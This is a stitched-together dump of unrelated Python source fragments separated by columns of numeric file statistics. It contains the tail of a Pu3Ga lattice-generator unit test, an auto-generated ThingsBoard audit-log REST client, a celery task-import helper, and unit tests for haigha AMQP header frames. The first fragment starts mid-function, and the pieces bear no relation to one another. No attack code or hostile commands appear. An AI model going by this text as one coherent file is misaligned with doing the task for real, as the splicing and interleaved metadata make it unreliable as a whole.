        self.assertEqual(lattice.specieCount[1], gacnt)
        # per-atom specie indices must agree with the aggregate counts
        self.assertEqual(len([x for x in lattice.specie if x == 0]), numatom - gacnt)
        self.assertEqual(len([x for x in lattice.specie if x == 1]), gacnt)
        self.assertTrue(np.allclose(lattice.cellDims, [6, 6, 6]))

    # 5 percent
    checkLattice(5)
    # 2 percent
    checkLattice(2)
def test_latticeGenPu3GaNoPBC(self):
    """
    Pu3Ga lattice generator (no PBCs)
    """
    # 5 percent Ga, 1x3x2 unit cells, all periodic boundaries disabled.
    args = lattice_gen_pu3ga.Args(percGa=5, NCells=[1, 3, 2], a0=3.0, pbcx=False, pbcy=False, pbcz=False)
    status, lattice = self.generator.generateLattice(args)
    # Expected flat [x0, y0, z0, x1, y1, z1, ...] coordinate array for the
    # non-periodic 1x3x2 cell; without PBCs the boundary atoms are kept,
    # so there are 53 atoms rather than the periodic 2x2x2 case's 32.
    pos = np.asarray([ 0. , 0. , 0. , 0. , 1.5, 1.5, 1.5, 0. , 1.5, 1.5, 1.5,
        0. , 0. , 0. , 3. , 0. , 1.5, 4.5, 1.5, 0. , 4.5, 1.5,
        1.5, 3. , 0. , 0. , 6. , 1.5, 1.5, 6. , 0. , 3. , 0. ,
        0. , 4.5, 1.5, 1.5, 3. , 1.5, 1.5, 4.5, 0. , 0. , 3. ,
        3. , 0. , 4.5, 4.5, 1.5, 3. , 4.5, 1.5, 4.5, 3. , 0. ,
        3. , 6. , 1.5, 4.5, 6. , 0. , 6. , 0. , 0. , 7.5, 1.5,
        1.5, 6. , 1.5, 1.5, 7.5, 0. , 0. , 6. , 3. , 0. , 7.5,
        4.5, 1.5, 6. , 4.5, 1.5, 7.5, 3. , 0. , 6. , 6. , 1.5,
        7.5, 6. , 0. , 9. , 0. , 1.5, 9. , 1.5, 0. , 9. , 3. ,
        1.5, 9. , 4.5, 0. , 9. , 6. , 3. , 0. , 0. , 3. , 1.5,
        1.5, 3. , 0. , 3. , 3. , 1.5, 4.5, 3. , 0. , 6. , 3. ,
        3. , 0. , 3. , 4.5, 1.5, 3. , 3. , 3. , 3. , 4.5, 4.5,
        3. , 3. , 6. , 3. , 6. , 0. , 3. , 7.5, 1.5, 3. , 6. ,
        3. , 3. , 7.5, 4.5, 3. , 6. , 6. , 3. , 9. , 0. , 3. ,
        9. , 3. , 3. , 9. , 6. ])
    numatom = 53
    # Ga count implied by the requested percentage, truncated toward zero
    # (int() floor for positive values) — mirrors the generator's rule.
    gacnt = int(args.percGa * 0.01 * float(numatom))
    self.assertEqual(status, 0)
    self.assertIsInstance(lattice, Lattice)
    self.assertEqual(lattice.NAtoms, numatom)
    self.assertTrue(np.allclose(lattice.pos, pos))
    # Specie bookkeeping: index 0 = Pu, index 1 = Ga.
    self.assertEqual(len(lattice.specieList), 2)
    self.assertEqual(lattice.specieList[0], "Pu")
    self.assertEqual(lattice.specieList[1], "Ga")
    self.assertEqual(len(lattice.specieCount), 2)
    self.assertEqual(lattice.specieCount[0], numatom - gacnt)
    self.assertEqual(lattice.specieCount[1], gacnt)
    # Per-atom specie indices must agree with the aggregate counts.
    self.assertEqual(len([x for x in lattice.specie if x == 0]), numatom - gacnt)
    self.assertEqual(len([x for x in lattice.specie if x == 1]), gacnt)
    # Cell dims = NCells * a0 per axis: [1,3,2] * 3.0 -> [3, 9, 6].
    self.assertTrue(np.allclose(lattice.cellDims, [3,9,6]))
    # 11 percent
    # Same geometry, different Ga fraction: positions and cell dims are
    # expected to be identical; only the specie partitioning changes.
    args = lattice_gen_pu3ga.Args(percGa=11, NCells=[1, 3, 2], a0=3.0, pbcx=False, pbcy=False, pbcz=False)
    status, lattice = self.generator.generateLattice(args)
    numatom = 53
    gacnt = int(args.percGa * 0.01 * float(numatom))
    self.assertEqual(status, 0)
    self.assertIsInstance(lattice, Lattice)
    self.assertEqual(lattice.NAtoms, numatom)
    self.assertTrue(np.allclose(lattice.pos, pos))
    self.assertEqual(len(lattice.specieList), 2)
    self.assertEqual(lattice.specieList[0], "Pu")
    self.assertEqual(lattice.specieList[1], "Ga")
    self.assertEqual(len(lattice.specieCount), 2)
    self.assertEqual(lattice.specieCount[0], numatom - gacnt)
    self.assertEqual(lattice.specieCount[1], gacnt)
    self.assertEqual(len([x for x in lattice.specie if x == 0]), numatom - gacnt)
    self.assertEqual(len([x for x in lattice.specie if x == 1]), gacnt)
    self.assertTrue(np.allclose(lattice.cellDims, [3,9,6]))
| 49.678322
| 110
| 0.496059
| 968
| 7,104
| 3.615702
| 0.082645
| 0.033143
| 0.031714
| 0.021714
| 0.858571
| 0.85
| 0.831429
| 0.808857
| 0.762
| 0.762
| 0
| 0.100295
| 0.331926
| 7,104
| 142
| 111
| 50.028169
| 0.637168
| 0.027872
| 0
| 0.647619
| 0
| 0
| 0.002377
| 0
| 0
| 0
| 0
| 0
| 0.495238
| 1
| 0.038095
| false
| 0
| 0.057143
| 0
| 0.104762
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6c38fefb5a1ed60cf56288129ededb117761170
| 22,392
|
py
|
Python
|
tb_rest_client/api/api_ce/audit_log_controller_api.py
|
maksonlee/python_tb_rest_client
|
a6cd17ef4de31f68c3226b7a9835292fbac4b1fa
|
[
"Apache-2.0"
] | 1
|
2021-07-19T10:09:04.000Z
|
2021-07-19T10:09:04.000Z
|
tb_rest_client/api/api_ce/audit_log_controller_api.py
|
moravcik94/python_tb_rest_client
|
985361890cdf4ccce93d2b24905ad9003c8dfcaa
|
[
"Apache-2.0"
] | null | null | null |
tb_rest_client/api/api_ce/audit_log_controller_api.py
|
moravcik94/python_tb_rest_client
|
985361890cdf4ccce93d2b24905ad9003c8dfcaa
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
# Copyright 2020. ThingsBoard
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class AuditLogControllerApi(object):
    """Client for the ThingsBoard audit-log REST endpoints.

    NOTE: This class is auto generated by the swagger code generator program.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        # Use the supplied transport, or build a default one when the
        # caller does not provide an ApiClient of their own.
        self.api_client = ApiClient() if api_client is None else api_client
def get_audit_logs_by_customer_id_using_get(self, customer_id, limit, **kwargs): # noqa: E501
"""getAuditLogsByCustomerId # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_audit_logs_by_customer_id_using_get(customer_id, limit, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str customer_id: customerId (required)
:param str limit: limit (required)
:param int start_time: startTime
:param int end_time: endTime
:param bool asc_order: ascOrder
:param str offset: offset
:param str action_types: actionTypes
:return: TimePageDataAuditLog
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_audit_logs_by_customer_id_using_get_with_http_info(customer_id, limit, **kwargs) # noqa: E501
else:
(data) = self.get_audit_logs_by_customer_id_using_get_with_http_info(customer_id, limit, **kwargs) # noqa: E501
return data
def get_audit_logs_by_customer_id_using_get_with_http_info(self, customer_id, limit, **kwargs):  # noqa: E501
    """getAuditLogsByCustomerId  # noqa: E501

    Build and issue the GET request for one customer's audit-log page.

    :param async_req bool
    :param str customer_id: customerId (required)
    :param str limit: limit (required)
    :param int start_time: startTime
    :param int end_time: endTime
    :param bool asc_order: ascOrder
    :param str offset: offset
    :param str action_types: actionTypes
    :return: TimePageDataAuditLog
    """
    all_params = ['customer_id', 'limit', 'start_time', 'end_time',
                  'asc_order', 'offset', 'action_types', 'async_req',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout']  # noqa: E501
    # Snapshot the named arguments, then fold the keyword overflow in so
    # every parameter can be looked up uniformly by name.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        params[key] = val
    del params['kwargs']

    # Both the path parameter and the page limit are mandatory.
    for required in ('customer_id', 'limit'):
        if params.get(required) is None:
            raise ValueError("Missing the required parameter `%s` when calling "
                             "`get_audit_logs_by_customer_id_using_get`" % required)  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'customer_id' in params:
        path_params['customerId'] = params['customer_id']  # noqa: E501

    # Preserve the generated client's query-string ordering.
    query_params = []
    for attr, wire in (('start_time', 'startTime'), ('end_time', 'endTime'),
                       ('asc_order', 'ascOrder'), ('offset', 'offset'),
                       ('action_types', 'actionTypes'), ('limit', 'limit')):
        if attr in params:
            query_params.append((wire, params[attr]))

    header_params = {
        'Accept': self.api_client.select_header_accept(['*/*']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    # GET request: no body, no form fields, no file uploads.
    return self.api_client.call_api(
        '/api/audit/logs/customer/{customerId}{?startTime,endTime,ascOrder,offset,actionTypes,limit}', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='TimePageDataAuditLog',  # noqa: E501
        auth_settings=['X-Authorization'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_audit_logs_by_entity_id_using_get(self, entity_type, entity_id, limit, **kwargs): # noqa: E501
"""getAuditLogsByEntityId # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_audit_logs_by_entity_id_using_get(entity_type, entity_id, limit, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_type: entityType (required)
:param str entity_id: entityId (required)
:param str limit: limit (required)
:param int start_time: startTime
:param int end_time: endTime
:param bool asc_order: ascOrder
:param str offset: offset
:param str action_types: actionTypes
:return: TimePageDataAuditLog
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_audit_logs_by_entity_id_using_get_with_http_info(entity_type, entity_id, limit, **kwargs) # noqa: E501
else:
(data) = self.get_audit_logs_by_entity_id_using_get_with_http_info(entity_type, entity_id, limit, **kwargs) # noqa: E501
return data
def get_audit_logs_by_entity_id_using_get_with_http_info(self, entity_type, entity_id, limit, **kwargs):  # noqa: E501
    """getAuditLogsByEntityId  # noqa: E501

    Build and issue the GET request for one entity's audit-log page.

    :param async_req bool
    :param str entity_type: entityType (required)
    :param str entity_id: entityId (required)
    :param str limit: limit (required)
    :param int start_time: startTime
    :param int end_time: endTime
    :param bool asc_order: ascOrder
    :param str offset: offset
    :param str action_types: actionTypes
    :return: TimePageDataAuditLog
    """
    all_params = ['entity_type', 'entity_id', 'limit', 'start_time',
                  'end_time', 'asc_order', 'offset', 'action_types',
                  'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']  # noqa: E501
    # Snapshot the named arguments, then fold the keyword overflow in so
    # every parameter can be looked up uniformly by name.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        params[key] = val
    del params['kwargs']

    # Both path parameters and the page limit are mandatory.
    for required in ('entity_type', 'entity_id', 'limit'):
        if params.get(required) is None:
            raise ValueError("Missing the required parameter `%s` when calling "
                             "`get_audit_logs_by_entity_id_using_get`" % required)  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'entity_type' in params:
        path_params['entityType'] = params['entity_type']  # noqa: E501
    if 'entity_id' in params:
        path_params['entityId'] = params['entity_id']  # noqa: E501

    # Preserve the generated client's query-string ordering.
    query_params = []
    for attr, wire in (('start_time', 'startTime'), ('end_time', 'endTime'),
                       ('asc_order', 'ascOrder'), ('offset', 'offset'),
                       ('action_types', 'actionTypes'), ('limit', 'limit')):
        if attr in params:
            query_params.append((wire, params[attr]))

    header_params = {
        'Accept': self.api_client.select_header_accept(['*/*']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    # GET request: no body, no form fields, no file uploads.
    return self.api_client.call_api(
        '/api/audit/logs/entity/{entityType}/{entityId}{?startTime,endTime,ascOrder,offset,actionTypes,limit}', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='TimePageDataAuditLog',  # noqa: E501
        auth_settings=['X-Authorization'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_audit_logs_by_user_id_using_get(self, user_id, limit, **kwargs): # noqa: E501
"""getAuditLogsByUserId # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_audit_logs_by_user_id_using_get(user_id, limit, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_id: userId (required)
:param str limit: limit (required)
:param int start_time: startTime
:param int end_time: endTime
:param bool asc_order: ascOrder
:param str offset: offset
:param str action_types: actionTypes
:return: TimePageDataAuditLog
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_audit_logs_by_user_id_using_get_with_http_info(user_id, limit, **kwargs) # noqa: E501
else:
(data) = self.get_audit_logs_by_user_id_using_get_with_http_info(user_id, limit, **kwargs) # noqa: E501
return data
def get_audit_logs_by_user_id_using_get_with_http_info(self, user_id, limit, **kwargs):  # noqa: E501
    """getAuditLogsByUserId  # noqa: E501

    Build and issue the GET request for one user's audit-log page.

    :param async_req bool
    :param str user_id: userId (required)
    :param str limit: limit (required)
    :param int start_time: startTime
    :param int end_time: endTime
    :param bool asc_order: ascOrder
    :param str offset: offset
    :param str action_types: actionTypes
    :return: TimePageDataAuditLog
    """
    all_params = ['user_id', 'limit', 'start_time', 'end_time',
                  'asc_order', 'offset', 'action_types', 'async_req',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout']  # noqa: E501
    # Snapshot the named arguments, then fold the keyword overflow in so
    # every parameter can be looked up uniformly by name.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        params[key] = val
    del params['kwargs']

    # Both the path parameter and the page limit are mandatory.
    for required in ('user_id', 'limit'):
        if params.get(required) is None:
            raise ValueError("Missing the required parameter `%s` when calling "
                             "`get_audit_logs_by_user_id_using_get`" % required)  # noqa: E501

    collection_formats = {}

    path_params = {}
    if 'user_id' in params:
        path_params['userId'] = params['user_id']  # noqa: E501

    # Preserve the generated client's query-string ordering.
    query_params = []
    for attr, wire in (('start_time', 'startTime'), ('end_time', 'endTime'),
                       ('asc_order', 'ascOrder'), ('offset', 'offset'),
                       ('action_types', 'actionTypes'), ('limit', 'limit')):
        if attr in params:
            query_params.append((wire, params[attr]))

    header_params = {
        'Accept': self.api_client.select_header_accept(['*/*']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    # GET request: no body, no form fields, no file uploads.
    return self.api_client.call_api(
        '/api/audit/logs/user/{userId}{?startTime,endTime,ascOrder,offset,actionTypes,limit}', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='TimePageDataAuditLog',  # noqa: E501
        auth_settings=['X-Authorization'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_audit_logs_using_get(self, limit, **kwargs): # noqa: E501
"""getAuditLogs # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.get_audit_logs_using_get(limit, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str limit: limit (required)
:param int start_time: startTime
:param int end_time: endTime
:param bool asc_order: ascOrder
:param str offset: offset
:param str action_types: actionTypes
:return: TimePageDataAuditLog
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_audit_logs_using_get_with_http_info(limit, **kwargs) # noqa: E501
else:
(data) = self.get_audit_logs_using_get_with_http_info(limit, **kwargs) # noqa: E501
return data
def get_audit_logs_using_get_with_http_info(self, limit, **kwargs):  # noqa: E501
    """getAuditLogs  # noqa: E501

    Build and issue the GET request for the tenant-wide audit-log page.

    :param async_req bool
    :param str limit: limit (required)
    :param int start_time: startTime
    :param int end_time: endTime
    :param bool asc_order: ascOrder
    :param str offset: offset
    :param str action_types: actionTypes
    :return: TimePageDataAuditLog
    """
    all_params = ['limit', 'start_time', 'end_time', 'asc_order',
                  'offset', 'action_types', 'async_req',
                  '_return_http_data_only', '_preload_content',
                  '_request_timeout']  # noqa: E501
    # Snapshot the named arguments, then fold the keyword overflow in so
    # every parameter can be looked up uniformly by name.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        params[key] = val
    del params['kwargs']

    # The page limit is the only mandatory parameter for this endpoint.
    if params.get('limit') is None:
        raise ValueError("Missing the required parameter `limit` when calling "
                         "`get_audit_logs_using_get`")  # noqa: E501

    collection_formats = {}
    path_params = {}

    # Preserve the generated client's query-string ordering.
    query_params = []
    for attr, wire in (('start_time', 'startTime'), ('end_time', 'endTime'),
                       ('asc_order', 'ascOrder'), ('offset', 'offset'),
                       ('action_types', 'actionTypes'), ('limit', 'limit')):
        if attr in params:
            query_params.append((wire, params[attr]))

    header_params = {
        'Accept': self.api_client.select_header_accept(['*/*']),  # noqa: E501
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }

    # GET request: no body, no form fields, no file uploads.
    return self.api_client.call_api(
        '/api/audit/logs{?startTime,endTime,ascOrder,offset,actionTypes,limit}', 'GET',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='TimePageDataAuditLog',  # noqa: E501
        auth_settings=['X-Authorization'],  # noqa: E501
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
| 43.061538
| 145
| 0.63085
| 2,686
| 22,392
| 4.98064
| 0.075949
| 0.050232
| 0.028704
| 0.026162
| 0.919719
| 0.9103
| 0.902676
| 0.902228
| 0.897518
| 0.876065
| 0
| 0.016322
| 0.272195
| 22,392
| 519
| 146
| 43.144509
| 0.804565
| 0.336593
| 0
| 0.784906
| 0
| 0.011321
| 0.227056
| 0.066359
| 0
| 0
| 0
| 0
| 0
| 1
| 0.033962
| false
| 0
| 0.015094
| 0
| 0.098113
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fc0f404380d029e46caef93ca3d6c5dd3243d4ff
| 60
|
py
|
Python
|
modules/ckanext-ytp_tasks/ckanext/ytp_tasks/celery_import.py
|
eetumans/opendata
|
061f58550bcb820016a764cca4763ed0a5f627fe
|
[
"MIT"
] | 16
|
2018-07-12T14:26:02.000Z
|
2022-02-24T12:10:00.000Z
|
modules/ckanext-ytp_tasks/ckanext/ytp_tasks/celery_import.py
|
eetumans/opendata
|
061f58550bcb820016a764cca4763ed0a5f627fe
|
[
"MIT"
] | 751
|
2017-09-28T07:47:50.000Z
|
2022-03-31T12:08:25.000Z
|
modules/ckanext-ytp_tasks/ckanext/ytp_tasks/celery_import.py
|
vrk-kpa/opendata-ckan
|
8936e2d9e700b9e5534fe2a51eedc2d1ede8c10b
|
[
"MIT"
] | 6
|
2017-10-31T07:47:07.000Z
|
2021-10-06T07:09:07.000Z
|
def task_imports():
    """Return the dotted module paths celery should scan for task definitions."""
    task_modules = ['ckanext.ytp_tasks.tasks']
    return task_modules
| 15
| 38
| 0.7
| 8
| 60
| 5
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.15
| 60
| 3
| 39
| 20
| 0.784314
| 0
| 0
| 0
| 0
| 0
| 0.389831
| 0.389831
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0.5
| 0.5
| 1.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
fc2c19fd9f8467ba2be4e72010983c06d641aaa1
| 8,389
|
py
|
Python
|
tests/unit/frames/header_frame_test.py
|
vitaly-krugl/haigha
|
e5320abfab91b89f4bad33644a7528e4517d96a7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/unit/frames/header_frame_test.py
|
vitaly-krugl/haigha
|
e5320abfab91b89f4bad33644a7528e4517d96a7
|
[
"BSD-3-Clause"
] | null | null | null |
tests/unit/frames/header_frame_test.py
|
vitaly-krugl/haigha
|
e5320abfab91b89f4bad33644a7528e4517d96a7
|
[
"BSD-3-Clause"
] | null | null | null |
'''
Copyright (c) 2011-2015, Agora Games, LLC All rights reserved.
https://github.com/agoragames/haigha/blob/master/LICENSE.txt
'''
from chai import Chai
import struct
import time
from datetime import datetime
from haigha.frames import header_frame
from haigha.frames.header_frame import HeaderFrame
from haigha.reader import Reader
from haigha.writer import Writer
class HeaderFrameTest(Chai):
    """Unit tests for haigha's AMQP content-header frame (HeaderFrame).

    NOTE(review): assert_equals / assertEquals are injected by the Chai
    base class; the use of ``long`` means this suite targets Python 2.
    """

    def test_type(self):
        # Content-header frames report wire type 2.
        assert_equals(2, HeaderFrame.type())

    def test_properties(self):
        # The constructor stores all five arguments verbatim.
        frame = HeaderFrame(42, 'class_id', 'weight', 'size', 'props')
        assert_equals(42, frame.channel_id)
        assert_equals('class_id', frame.class_id)
        assert_equals('weight', frame.weight)
        assert_equals('size', frame.size)
        assert_equals('props', frame.properties)

    def test_str(self):
        # Don't bother checking the copy
        frame = HeaderFrame(42, 5, 6, 7, 'props')
        assert_equals('HeaderFrame[channel: 42, class_id: 5, weight: 6, size: 7, properties: props]',
            str(frame))

    def test_parse_fast_for_standard_properties(self):
        """Round-trip every standard property through HeaderFrame.parse."""
        bit_writer = Writer()
        val_writer = Writer()
        # strip ms because amqp doesn't include it
        now = datetime.utcfromtimestamp(
            long(time.mktime(datetime.now().timetuple())))
        # Set the "present" flag for every property while writing a sample
        # value of the matching wire type.
        bit_field = 0
        for pname, ptype, reader, writer, mask in HeaderFrame.PROPERTIES:
            bit_field = (bit_field << 1) | 1
            if ptype == 'shortstr':
                val_writer.write_shortstr(pname)
            elif ptype == 'octet':
                val_writer.write_octet(42)
            elif ptype == 'timestamp':
                val_writer.write_timestamp(now)
            elif ptype == 'table':
                val_writer.write_table({'foo': 'bar'})
        # Property flags occupy the high bits of a 16-bit field.
        bit_field <<= (16 - len(HeaderFrame.PROPERTIES))
        bit_writer.write_short(bit_field)
        # Payload prefix: class_id=5, weight=6, size=7.
        header_writer = Writer()
        header_writer.write_short(5)
        header_writer.write_short(6)
        header_writer.write_longlong(7)
        payload = header_writer.buffer()
        payload += bit_writer.buffer()
        payload += val_writer.buffer()
        reader = Reader(payload)
        frame = HeaderFrame.parse(4, reader)
        # Every sample value must come back under its property name.
        # (The loop variable `reader` shadows the Reader above; it is not
        # used again afterwards.)
        for pname, ptype, reader, writer, mask in HeaderFrame.PROPERTIES:
            if ptype == 'shortstr':
                self.assertEquals(pname, frame.properties[pname])
            elif ptype == 'octet':
                self.assertEquals(42, frame.properties[pname])
            elif ptype == 'timestamp':
                self.assertEquals(now, frame.properties[pname])
            elif ptype == 'table':
                self.assertEquals({'foo': 'bar'}, frame.properties[pname])
        assert_equals(4, frame.channel_id)
        assert_equals(5, frame._class_id)
        assert_equals(6, frame._weight)
        assert_equals(7, frame._size)

    def test_parse_slow_for_standard_properties(self):
        """Same round-trip, forcing the generic (non-default) parse path."""
        # Disable the optimized default-properties path for this test;
        # restored to True after parse() below.
        HeaderFrame.DEFAULT_PROPERTIES = False
        bit_writer = Writer()
        val_writer = Writer()
        # strip ms because amqp doesn't include it
        now = datetime.utcfromtimestamp(
            long(time.mktime(datetime.now().timetuple())))
        bit_field = 0
        for pname, ptype, reader, writer, mask in HeaderFrame.PROPERTIES:
            bit_field = (bit_field << 1) | 1
            if ptype == 'shortstr':
                val_writer.write_shortstr(pname)
            elif ptype == 'octet':
                val_writer.write_octet(42)
            elif ptype == 'timestamp':
                val_writer.write_timestamp(now)
            elif ptype == 'table':
                val_writer.write_table({'foo': 'bar'})
        bit_field <<= (16 - len(HeaderFrame.PROPERTIES))
        bit_writer.write_short(bit_field)
        header_writer = Writer()
        header_writer.write_short(5)
        header_writer.write_short(6)
        header_writer.write_longlong(7)
        payload = header_writer.buffer()
        payload += bit_writer.buffer()
        payload += val_writer.buffer()
        reader = Reader(payload)
        frame = HeaderFrame.parse(4, reader)
        HeaderFrame.DEFAULT_PROPERTIES = True
        for pname, ptype, reader, writer, mask in HeaderFrame.PROPERTIES:
            if ptype == 'shortstr':
                self.assertEquals(pname, frame.properties[pname])
            elif ptype == 'octet':
                self.assertEquals(42, frame.properties[pname])
            elif ptype == 'timestamp':
                self.assertEquals(now, frame.properties[pname])
            elif ptype == 'table':
                self.assertEquals({'foo': 'bar'}, frame.properties[pname])
        assert_equals(4, frame.channel_id)
        assert_equals(5, frame._class_id)
        assert_equals(6, frame._weight)
        assert_equals(7, frame._size)

    def test_write_frame_fast_for_standard_properties(self):
        """write_frame emits a type-2 frame that re-reads field for field."""
        bit_field = 0
        properties = {}
        now = datetime.utcfromtimestamp(
            long(time.mktime(datetime.now().timetuple())))
        # Populate every standard property with a sample value of its type.
        for pname, ptype, reader, writer, mask in HeaderFrame.PROPERTIES:
            bit_field |= mask
            if ptype == 'shortstr':
                properties[pname] = pname
            elif ptype == 'octet':
                properties[pname] = 42
            elif ptype == 'timestamp':
                properties[pname] = now
            elif ptype == 'table':
                properties[pname] = {'foo': 'bar'}
        frame = HeaderFrame(42, 5, 6, 7, properties)
        buf = bytearray()
        frame.write_frame(buf)
        reader = Reader(buf)
        # Frame envelope: type octet (2), channel id, payload size.
        assert_equals(2, reader.read_octet())
        assert_equals(42, reader.read_short())
        size = reader.read_long()
        start_pos = reader.tell()
        assert_equals(5, reader.read_short())
        assert_equals(6, reader.read_short())
        assert_equals(7, reader.read_longlong())
        # All property flags set: the top len(PROPERTIES) bits of the short.
        assert_equals(0b1111111111111100, reader.read_short())
        for pname, ptype, rfunc, wfunc, mask in HeaderFrame.PROPERTIES:
            if ptype == 'shortstr':
                assertEquals(pname, reader.read_shortstr())
            elif ptype == 'octet':
                assertEquals(42, reader.read_octet())
            elif ptype == 'timestamp':
                assertEquals(now, reader.read_timestamp())
            elif ptype == 'table':
                assertEquals({'foo': 'bar'}, reader.read_table())
        end_pos = reader.tell()
        # Declared payload size must match the bytes actually written, and
        # the frame must close with the 0xce end-of-frame marker.
        assert_equals(size, end_pos - start_pos)
        assert_equals(0xce, reader.read_octet())

    def test_write_frame_slow_for_standard_properties(self):
        """Same write round-trip, forcing the generic (non-default) path."""
        # Disable the optimized default-properties path; restored right
        # after write_frame() below.
        HeaderFrame.DEFAULT_PROPERTIES = False
        bit_field = 0
        properties = {}
        now = datetime.utcfromtimestamp(
            long(time.mktime(datetime.now().timetuple())))
        for pname, ptype, reader, writer, mask in HeaderFrame.PROPERTIES:
            bit_field |= mask
            if ptype == 'shortstr':
                properties[pname] = pname
            elif ptype == 'octet':
                properties[pname] = 42
            elif ptype == 'timestamp':
                properties[pname] = now
            elif ptype == 'table':
                properties[pname] = {'foo': 'bar'}
        frame = HeaderFrame(42, 5, 6, 7, properties)
        buf = bytearray()
        frame.write_frame(buf)
        HeaderFrame.DEFAULT_PROPERTIES = True
        reader = Reader(buf)
        assert_equals(2, reader.read_octet())
        assert_equals(42, reader.read_short())
        size = reader.read_long()
        start_pos = reader.tell()
        assert_equals(5, reader.read_short())
        assert_equals(6, reader.read_short())
        assert_equals(7, reader.read_longlong())
        assert_equals(0b1111111111111100, reader.read_short())
        for pname, ptype, rfunc, wfunc, mask in HeaderFrame.PROPERTIES:
            if ptype == 'shortstr':
                assertEquals(pname, reader.read_shortstr())
            elif ptype == 'octet':
                assertEquals(42, reader.read_octet())
            elif ptype == 'timestamp':
                assertEquals(now, reader.read_timestamp())
            elif ptype == 'table':
                assertEquals({'foo': 'bar'}, reader.read_table())
        end_pos = reader.tell()
        assert_equals(size, end_pos - start_pos)
        assert_equals(0xce, reader.read_octet())
| 36.473913
| 101
| 0.594469
| 911
| 8,389
| 5.288694
| 0.125137
| 0.07721
| 0.029058
| 0.044832
| 0.844956
| 0.834579
| 0.818182
| 0.818182
| 0.818182
| 0.818182
| 0
| 0.021136
| 0.295029
| 8,389
| 229
| 102
| 36.633188
| 0.793541
| 0.02837
| 0
